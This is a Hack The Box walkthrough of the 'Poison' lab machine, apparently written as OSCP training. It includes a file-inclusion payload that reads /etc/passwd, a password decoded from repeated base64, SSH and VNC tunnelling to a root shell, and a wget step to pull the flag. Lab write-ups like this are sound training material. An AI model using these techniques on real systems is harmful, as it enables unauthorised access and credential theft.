Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines in their road to OSCP, a well-known, respected, and required for many top cybersecurity positions certification. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.

Let's start with the fun!

Poison

Initial Foothold

Looking at the webpage on port 80 and playing with the different options, we run listfile.php and see that there is a text file called pwdbackup.txt with the following contents:

This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

After decoding base64 a million times: Charix!2#4%6&8(0.

We also see that when running a script from the main page, it puts them as a parameter of browse.php: http://10.10.10.84/browse.php?file=ini.php.

Can we read different files? http://10.10.10.84/browse.php?file=/etc/passwd. We can, WTF... And we find an user called charix.

So, we can ssh in as charix with the password: Charix!2#4%6&8(0.

Root

On the user's home there is a file called secret.zip, if we try to extract it says it has a password. Using the same password we used for the ssh connection, we can unzip the file, which looks like gibberish.

After doing some manual enumeration (because fucking BSD), we stumble upon a peculiar process when doing ps aux. root 529 0.0 0.9 23620 8868 v0- I 17:58 0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -lo

We see that it is a VNC server running on port 5901, which we can confirm with sockstat -l.

The easiest way to interact with this service is to tunnel it through ssh (pro-tip, use the konami code for ssh): From our ssh session press ENTER and type ~C and then add -L 6969:localhost:5901.

Now we can use a VNC client, like vncviewer to connect to it: vncviewer localhost:6969

It does not work, it requires a password. We have something that might be the password, the file we extracted from secret.zip, but it does not even look like printable text. Maybe we can input the password directly as a file. Searching through vncviewer -h we see that this option exists: -p.

So, with the following command: vncviewer -p secret localhost:6969 we connect to the VNC server, which displays a terminal with a root shell in it.

Bonus Footage

Since I could not manage to copy paste the damn root.txt, I used python -m SimpleHTTPServer 6969 to quickly download it from my machine using wget 10.10.10.84:6969/root.txt.